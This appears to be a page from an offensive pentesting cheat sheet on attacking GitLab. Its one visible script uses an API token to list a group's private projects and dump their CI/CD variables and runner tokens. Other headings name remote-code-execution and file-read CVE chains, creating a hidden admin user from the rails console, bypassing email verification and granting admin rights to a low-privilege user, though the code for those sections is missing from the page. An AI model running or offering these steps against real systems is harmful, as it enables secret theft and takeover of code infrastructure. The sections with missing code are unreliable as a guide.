search
TwitterGitHubBlog

GitLab

hashtag
Search for Secrets

Search for CI/CD variables and runner tokens:

TOKEN=`cat token`
GITLAB=gitlab.megacorp.local
API="https://$GITLAB/api/v4"

curl -sH "Authorization: Bearer $TOKEN" "$API/user" | jq

# 1. bash get_project_ids.sh <PAGE_NUMBER> | tee -a projects
curl -sH "Authorization: Bearer $TOKEN" "$API/groups/<GROUP_NAME_OR_ID>/projects/?include_subgroups=true&visibility=private&per_page=100&page=$1" | jq -r '.[].id'

# 2. bash get_secrets.sh
for id in `cat projects`; do
    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq '.path'

    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id/variables" | jq

    curl -sH "Authorization: Bearer $TOKEN" "$API/projects/$id" | jq .runners_token | jq
done

Search for credential leaks with gitleaksarrow-up-right:

hashtag
GitLab Runners Abuse

hashtag
SSRF > Redis > RCE (CE/EE)

CVE-2018-19571, CVE-2018-19585

Also possible to use this payload (instead of IPv6) to bypass filter checks for localhost, but works only with git:// scheme:

hashtag
Path Traversal > LFI > RCE (CE/EE)

CVE-2020-10977

hashtag
Path Traversal > File Write > RCE (EE)

CVE-2019-19088

hashtag
gitlab-rails

Add new admin user from console:

Then activate the account by navigating to https://gitlab.megacorp.local/users/confirmation?confirmation_token=ZVrM4KsyEdSoTJvo8kx_.

Or just skip the verification:

Also for GitLab >= 16.11 personal space assignment is required:

Enable password authentication for web (e. g., when only LDAP authentication is available):

Grant a low-priv user admin's privileges via API:

hashtag
Arbitrary File Read

CVE-2023-2825

Last updated